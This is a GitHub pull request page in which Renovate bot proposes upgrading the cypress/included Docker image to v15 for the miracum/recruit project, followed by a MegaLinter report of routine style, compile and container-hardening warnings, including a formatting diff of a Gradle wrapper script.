chore(deps): update docker.io/cypress/included docker tag to v15 by renovate[bot] · Pull Request #491 · miracum/recruit

renovate · 2025-10-01T02:47:22Z

This PR contains the following updates:

Package	Type	Update	Change	Pending
docker.io/cypress/included	final	major	`14.5.4` → `15.14.0`	`15.14.2` (+1)

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

Configuration

📅 Schedule: (UTC)

Branch creation
- Between 12:00 AM and 03:59 AM, on day 1 of the month (* 0-3 1 * *)
Automerge
- At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

github-actions · 2025-10-01T03:01:15Z

✅⚠️MegaLinter analysis: Success with warnings

Descriptor	Linter	Files	Errors	Warnings	Elapsed time
✅ ACTION	actionlint	13	0	0	0.36s
✅ BASH	bash-exec	7	0	0	0.04s
✅ BASH	shellcheck	4	0	0	0.35s
⚠️ BASH	shfmt	7	1	0	0.03s
✅ CSHARP	csharpier	3	0	0	3.22s
⚠️ CSHARP	roslynator	1	1	0	14.41s
✅ CSS	stylelint	1	0	0	1.93s
✅ DOCKERFILE	hadolint	5	0	0	0.47s
✅ EDITORCONFIG	editorconfig-checker	434	0	0	3.12s
✅ ENV	dotenv-linter	1	0	0	0.02s
⚠️ GROOVY	npm-groovy-lint	8	0	20	25.15s
✅ HTML	djlint	2	0	0	2.03s
✅ HTML	htmlhint	2	0	0	0.57s
⚠️ JAVA	checkstyle	64	0	90	10.45s
✅ JSON	jsonlint	53	0	0	0.56s
✅ JSON	prettier	53	0	0	5.81s
✅ JSON	v8r	53	0	0	33.32s
⚠️ MARKDOWN	markdownlint	23	289	0	2.53s
✅ PYTHON	bandit	1	0	0	3.28s
✅ PYTHON	black	1	0	0	1.46s
✅ PYTHON	flake8	1	0	0	0.75s
✅ PYTHON	isort	1	0	0	0.33s
✅ PYTHON	mypy	1	0	0	9.67s
✅ PYTHON	ruff	1	0	0	0.02s
✅ REPOSITORY	checkov	yes	no	no	40.5s
✅ REPOSITORY	gitleaks	yes	no	no	5.45s
✅ REPOSITORY	git_diff	yes	no	no	0.29s
⚠️ REPOSITORY	kics	yes	no	98	59.31s
✅ REPOSITORY	secretlint	yes	no	no	4.37s
✅ REPOSITORY	syft	yes	no	no	13.08s
⚠️ REPOSITORY	trivy	yes	25	no	26.95s
✅ REPOSITORY	trivy-sbom	yes	no	no	5.97s
✅ REPOSITORY	trufflehog	yes	no	no	8.62s
✅ XML	xmllint	4	0	0	1.27s
✅ YAML	prettier	116	0	0	3.44s

Detailed Issues

⚠️ JAVA / checkstyle - 90 warnings

warning: First sentence of Javadoc is missing an ending period.

warning: First sentence of Javadoc is missing an ending period.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Line is longer than 100 characters (found 103).

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: First sentence of Javadoc is missing an ending period.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Line is longer than 100 characters (found 107).

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: First sentence of Javadoc is missing an ending period.

warning: Line is longer than 100 characters (found 115).

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Missing a Javadoc comment.

warning: Line is longer than 100 characters (found 220).

warning: Line is longer than 100 characters (found 104).

warning: Line is longer than 100 characters (found 117).

warning: Line is longer than 100 characters (found 154).

warning: Line is longer than 100 characters (found 111).

warning: Line is longer than 100 characters (found 128).

warning: Line is longer than 100 characters (found 142).

warning: Missing a Javadoc comment.

warning: Line is longer than 100 characters (found 104).

warning: Line is longer than 100 characters (found 132).

warning: Line is longer than 100 characters (found 141).

warning: 90 warnings emitted

⚠️ REPOSITORY / kics - 98 warnings

│
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
    ┌─ docker-compose/docker-compose.staging.yaml:211:1
    │
211 │   notify:
    │ ^^^^^^^^^
    │
    = Security Opt Not Set
    = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
    ┌─ docker-compose/docker-compose.staging.yaml:220:1
    │
220 │   query:
    │ ^^^^^^^^
    │
    = Security Opt Not Set
    = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
   ┌─ src/notify/tests/e2e/docker-compose.yaml:31:1
   │
31 │   tester:
   │ ^^^^^^^^^
   │
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
   ┌─ src/list/frontend/tests/e2e/docker-compose.yaml:59:1
   │
59 │   keycloak:
   │ ^^^^^^^^^^^
   │
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
  ┌─ src/query/tests/e2e/docker-compose.yaml:2:1
  │
2 │   query:
  │ ^^^^^^^^
  │
  = Security Opt Not Set
  = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
   ┌─ src/query/tests/e2e/docker-compose.yaml:28:1
   │
28 │   tester:
   │ ^^^^^^^^^
   │
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
   ┌─ src/list/frontend/deploy/docker-compose.dev.yml:26:1
   │
26 │   jaeger:
   │ ^^^^^^^^^
   │
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Docker compose file does not have 'security_opt' attribute
   ┌─ src/list/frontend/deploy/docker-compose.dev.yml:51:1
   │
51 │   fhir-pseudonymizer:
   │ ^^^^^^^^^^^^^^^^^^^^^
   │
   = Security Opt Not Set
   = Attribute 'security_opt' should be defined.

warning: Dockerfile doesn't contain instruction 'HEALTHCHECK'
   ┌─ src/Dockerfile:20:1
   │
20 │ FROM gcr.io/distroless/java25-debian13:nonroot@sha256:ace83a068839dbfb151b0d80693df23120f6d13f963427fde7e43d9a175fd54a
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   │
   = Healthcheck Instruction Missing
   = Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

warning: Dockerfile doesn't contain instruction 'HEALTHCHECK'
  ┌─ src/list/frontend/tests/e2e/Dockerfile:1:1
  │
1 │ FROM docker.io/cypress/included:15.14.0@sha256:9e069952fedf00e73cadd4ee1e80404d92ba8552e5e7e49caee5c920075f24c6
  │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  │
  = Healthcheck Instruction Missing
  = Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

warning: Dockerfile doesn't contain instruction 'HEALTHCHECK'
  ┌─ src/query/tests/e2e/Dockerfile:1:1
  │
1 │ FROM docker.io/library/python:3.14.2-slim-bookworm@sha256:e87711ef5c86aaeaa7031718a69db79d334d94c545c709583f651b8185870941
  │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  │
  = Healthcheck Instruction Missing
  = Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

warning: Dockerfile doesn't contain instruction 'HEALTHCHECK'
   ┌─ src/list/Dockerfile:35:1
   │
35 │ FROM gcr.io/distroless/nodejs24-debian13:nonroot@sha256:38792f83f35f2df89d403f49491782981dd13a853bbcb09ff978d79328263463
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   │
   = Healthcheck Instruction Missing
   = Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

warning: There are COPY instructions that could be grouped
   ┌─ src/Dockerfile:24:1
   │
24 │ COPY --from=build /home/gradle/project/${MODULE_NAME}/dependencies/ ./
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   │
   = Multiple RUN, ADD, COPY, Instructions Listed
   = Multiple commands (RUN, COPY, ADD) should be grouped in order to reduce the number of layers.

warning: Volume {"target": "/tmp", "tmpfs": {"size": 1024}, "type": "tmpfs"} shared between containers
   ┌─ docker-compose/docker-compose.yaml:93:1
   │
93 │       - type: tmpfs
   │ ^^^^^^^^^^^^^^^^^^^
   │
   = Shared Volumes Between Containers
   = Volumes shared between containers can cause data corruption or can be used to share malicious files between containers.

warning: Volume {"target": "/tmp", "tmpfs": {"size": 1024}, "type": "tmpfs"} shared between containers
    ┌─ docker-compose/docker-compose.yaml:118:1
    │
118 │       - type: tmpfs
    │ ^^^^^^^^^^^^^^^^^^^
    │
    = Shared Volumes Between Containers
    = Volumes shared between containers can cause data corruption or can be used to share malicious files between containers.

warning: Volume {"target": "/tmp", "tmpfs": {"size": 1024}, "type": "tmpfs"} shared between containers
   ┌─ docker-compose/docker-compose.yaml:67:1
   │
67 │       - type: tmpfs
   │ ^^^^^^^^^^^^^^^^^^^
   │
   = Shared Volumes Between Containers
   = Volumes shared between containers can cause data corruption or can be used to share malicious files between containers.

warning: 98 warnings emitted

(Truncated to last 5714 characters out of 30450)

⚠️ MARKDOWN / markdownlint - 289 errors

Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:24:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:25:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:26:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:27:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:28:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:31:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:32:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:33:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:34:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:35:121 error MD013/line-length Line length [Expected: 120; Actual: 267]
docs/configuration/options.md:39:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:40:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:41:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:42:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:43:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:44:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:45:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:46:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:47:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:49:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:50:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:52:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:53:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:54:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:55:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:56:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:57:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:58:121 error MD013/line-length Line length [Expected: 120; Actual: 376]
docs/configuration/options.md:59:218 error MD059/descriptive-link-text Link text should be descriptive [Context: "[here]"]
docs/configuration/options.md:63:121 error MD013/line-length Line length [Expected: 120; Actual: 126]
docs/configuration/options.md:68:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:69:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:70:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:71:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:72:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:73:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:74:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:75:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:76:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:77:121 error MD013/line-length Line length [Expected: 120; Actual: 240]
docs/configuration/options.md:80:121 error MD013/line-length Line length [Expected: 120; Actual: 293]
docs/deployment/docker-compose.md:43:121 error MD013/line-length Line length [Expected: 120; Actual: 171]
docs/deployment/docker-compose.md:44:121 error MD013/line-length Line length [Expected: 120; Actual: 171]
docs/deployment/kubernetes.md:12:121 error MD013/line-length Line length [Expected: 120; Actual: 125]
docs/deployment/resource-requirements.md:7:2 error MD059/descriptive-link-text Link text should be descriptive [Context: "[here]"]
docs/deployment/resource-requirements.md:8:6 error MD059/descriptive-link-text Link text should be descriptive [Context: "[here]"]
docs/deployment/resource-requirements.md:36 error MD039/no-space-in-links Spaces inside link text [Context: "...ment for Pods and Containers ]"]
docs/development/contributing.md:64:121 error MD013/line-length Line length [Expected: 120; Actual: 174]
docs/development/contributing.md:70:121 error MD013/line-length Line length [Expected: 120; Actual: 172]
docs/index.md:23:121 error MD013/line-length Line length [Expected: 120; Actual: 302]
docs/index.md:39:121 error MD013/line-length Line length [Expected: 120; Actual: 125]
docs/trino/index.md:10:121 error MD013/line-length Line length [Expected: 120; Actual: 132]
docs/trino/index.md:19:121 error MD013/line-length Line length [Expected: 120; Actual: 151]
docs/trino/index.md:22:121 error MD013/line-length Line length [Expected: 120; Actual: 147]
docs/trino/index.md:23:121 error MD013/line-length Line length [Expected: 120; Actual: 144]

(Truncated to last 5714 characters out of 29222)

⚠️ GROOVY / npm-groovy-lint - 20 warnings

uildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:74:24
   │
74 │             intoLayer("application")
   │                        ^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'module-dependencies' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:77:24
   │
77 │             intoLayer("module-dependencies") {
   │                        ^^^^^^^^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'org.miracum:*:*' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:78:26
   │
78 │                 include("org.miracum:*:*")
   │                          ^^^^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'dependencies' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:80:24
   │
80 │             intoLayer("dependencies")
   │                        ^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'dependencies' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:82:25
   │
82 │         layerOrder = [ "dependencies", "spring-boot-loader", "module-dependencies", "application" ]
   │                         ^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'spring-boot-loader' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:82:41
   │
82 │         layerOrder = [ "dependencies", "spring-boot-loader", "module-dependencies", "application" ]
   │                                         ^^^^^^^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'module-dependencies' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:82:63
   │
82 │         layerOrder = [ "dependencies", "spring-boot-loader", "module-dependencies", "application" ]
   │                                                               ^^^^^^^^^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: The String 'application' can be wrapped in single quotes instead of double quotes
   ┌─ src/buildSrc/src/main/groovy/org.miracum.recruit.java-application-conventions.gradle:82:86
   │
82 │         layerOrder = [ "dependencies", "spring-boot-loader", "module-dependencies", "application" ]
   │                                                                                      ^^^^^^^^^^^
   │
   = String objects should be created with single quotes, and GString objects created with double quotes. Creating normal String objects with double quotes is confusing to readers.

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

note: The statement on line 16 in class None is at the incorrect indent level: Expected one of columns [5, 9, 13] but was 3
 = Check indentation for class and method declarations, and initial statements.

note: The statement on line 17 in class None is at the incorrect indent level: Expected one of columns [9, 13, 17] but was 5
 = Check indentation for class and method declarations, and initial statements.

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

note: Class should be marked with one of @GrailsCompileStatic, @CompileStatic or @CompileDynamic
 = Check that classes are explicitely annotated with either @GrailsCompileStatic, @CompileStatic or @CompileDynamic

(Truncated to last 5714 characters out of 7255)

⚠️ CSHARP / roslynator - 1 error

not defined or imported
      Program.cs(180,26): error CS0518: Predefined type 'System.Exception' is not defined or imported
      Program.cs(180,30): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(180,40): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(182,16): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(184,13): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(185,17): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(185,17): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(185,85): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(187,17): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(187,17): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(187,32): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(192,19): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(192,53): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(192,74): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(196,9): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(197,13): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(197,13): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(197,105): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(200,13): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(200,13): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(202,13): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(202,31): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(206,13): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(206,13): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(206,28): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(208,19): error CS0518: Predefined type 'System.Exception' is not defined or imported
      Program.cs(208,23): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(209,17): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(209,17): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(209,107): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(213,15): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(213,49): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(213,70): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(217,1): error CS0518: Predefined type 'System.Void' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.IEquatable`1' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.IEquatable`1' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Object' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Void' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Type' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Boolean' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.Text.StringBuilder' is not defined or imported
      Program.cs(217,8): error CS0518: Predefined type 'System.String' is not defined or imported
      Program.cs(217,24): error CS0518: Predefined type 'System.Int32' is not defined or imported
      Program.cs(217,24): error CS0518: Predefined type 'System.Void' is not defined or imported
      Program.cs(217,28): error CS0518: Predefined type 'System.Runtime.CompilerServices.IsExternalInit' is not defined or imported
      Program.cs(9,1): error CS1729: 'object' does not contain a constructor that takes 0 arguments
      Program.cs(217,8): error CS1729: 'object' does not contain a constructor that takes 0 arguments
      Program.cs(217,8): error CS1729: 'object' does not contain a constructor that takes 0 arguments
      error CS5001: Program does not contain a static 'Main' method suitable for an entry point
    Analyzed project 'tests/chaos/tester/tester.csproj' (in 6.2 s)
    
     20 CS0103 
      3 CS0161 
     43 CS0246 
    169 CS0518 
      3 CS1729 
      1 CS5001 
    
    239 diagnostics found



(Truncated to last 5714 characters out of 26578)

⚠️ BASH / shfmt - 1 error

ACMD=$JAVA_HOME/bin/java
+  fi
+  if [ ! -x "$JAVACMD" ]; then
+    die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+  fi
 else
-    JAVACMD=java
-    if ! command -v java >/dev/null 2>&1
-    then
-        die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
-
-Please set the JAVA_HOME variable in your environment to match the
-location of your Java installation."
-    fi
+  JAVACMD=java
+  if ! command -v java >/dev/null 2>&1; then
+    die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+  fi
 fi
 
 # Increase the maximum file descriptors if we can.
-if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then
-    case $MAX_FD in #(
-      max*)
-        # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked.
-        # shellcheck disable=SC2039,SC3045
-        MAX_FD=$( ulimit -H -n ) ||
-            warn "Could not query maximum file descriptor limit"
-    esac
-    case $MAX_FD in  #(
-      '' | soft) :;; #(
-      *)
-        # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked.
-        # shellcheck disable=SC2039,SC3045
-        ulimit -n "$MAX_FD" ||
-            warn "Could not set maximum file descriptor limit to $MAX_FD"
-    esac
+if ! "$cygwin" && ! "$darwin" && ! "$nonstop"; then
+  case $MAX_FD in #(
+  max*)
+    # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked.
+    # shellcheck disable=SC2039,SC3045
+    MAX_FD=$(ulimit -H -n) ||
+      warn "Could not query maximum file descriptor limit"
+    ;;
+  esac
+  case $MAX_FD in #(
+  '' | soft) : ;; #(
+  *)
+    # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked.
+    # shellcheck disable=SC2039,SC3045
+    ulimit -n "$MAX_FD" ||
+      warn "Could not set maximum file descriptor limit to $MAX_FD"
+    ;;
+  esac
 fi
 
 # Collect all arguments for the java command, stacking in reverse order:
@@ -169,35 +168,36 @@
 #   * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables.
 
 # For Cygwin or MSYS, switch paths to Windows format before running java
-if "$cygwin" || "$msys" ; then
-    APP_HOME=$( cygpath --path --mixed "$APP_HOME" )
-
-    JAVACMD=$( cygpath --unix "$JAVACMD" )
-
-    # Now convert the arguments - kludge to limit ourselves to /bin/sh
-    for arg do
-        if
-            case $arg in                                #(
-              -*)   false ;;                            # don't mess with options #(
-              /?*)  t=${arg#/} t=/${t%%/*}              # looks like a POSIX filepath
-                    [ -e "$t" ] ;;                      #(
-              *)    false ;;
-            esac
-        then
-            arg=$( cygpath --path --ignore --mixed "$arg" )
-        fi
-        # Roll the args list around exactly as many times as the number of
-        # args, so each arg winds up back in the position where it started, but
-        # possibly modified.
-        #
-        # NB: a `for` loop captures its iteration list before it begins, so
-        # changing the positional parameters here affects neither the number of
-        # iterations, nor the values presented in `arg`.
-        shift                   # remove old arg
-        set -- "$@" "$arg"      # push replacement arg
-    done
-fi
-
+if "$cygwin" || "$msys"; then
+  APP_HOME=$(cygpath --path --mixed "$APP_HOME")
+
+  JAVACMD=$(cygpath --unix "$JAVACMD")
+
+  # Now convert the arguments - kludge to limit ourselves to /bin/sh
+  for arg; do
+    if
+      case $arg in #(
+      -*) false ;; # don't mess with options #(
+      /?*)
+        t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath
+        [ -e "$t" ]
+        ;; #(
+      *) false ;;
+      esac
+    then
+      arg=$(cygpath --path --ignore --mixed "$arg")
+    fi
+    # Roll the args list around exactly as many times as the number of
+    # args, so each arg winds up back in the position where it started, but
+    # possibly modified.
+    #
+    # NB: a `for` loop captures its iteration list before it begins, so
+    # changing the positional parameters here affects neither the number of
+    # iterations, nor the values presented in `arg`.
+    shift              # remove old arg
+    set -- "$@" "$arg" # push replacement arg
+  done
+fi
 
 # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
 DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"'
@@ -209,14 +209,13 @@
 #     treated as '${Hostname}' itself on the command line.
 
 set -- \
-        "-Dorg.gradle.appname=$APP_BASE_NAME" \
-        -jar "$APP_HOME/gradle/wrapper/gradle-wrapper.jar" \
-        "$@"
